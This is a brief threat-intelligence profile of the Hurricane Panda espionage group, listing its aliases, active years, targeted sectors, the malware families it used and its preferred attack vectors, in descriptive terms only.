HURRICANE PANDA

Status: Inactive since Fall 2015

Other Names: Operation Umbrella Revolution, Operation Poisoned Hurricane

Active Since/Discovered: 2013

Last Report: December 2015

Targets: Telecommunications and technology companies. Targets confidential data and intellectual property

Target Sectors: internet services, engineering, and aerospace

Malware:
-RATs – Sakula Gh0st, PlugX, Hikit, Mimikatz
-Webshell RAT – Chopper webshell
--Easily obfuscated 70 byte text file that consists of an ‘eval()’ command
--Used to provide full command execution and file upload/download capabilities to the attackers.
--Typically uploaded to a web server via a SQL injection or WebDAV vulnerability

Preferred Attack Vector: zero-day vulnerabilities; a DNS resolution exploitation technique; unique toolkit; and a SQL injection vulnerabilities

sakulagh0st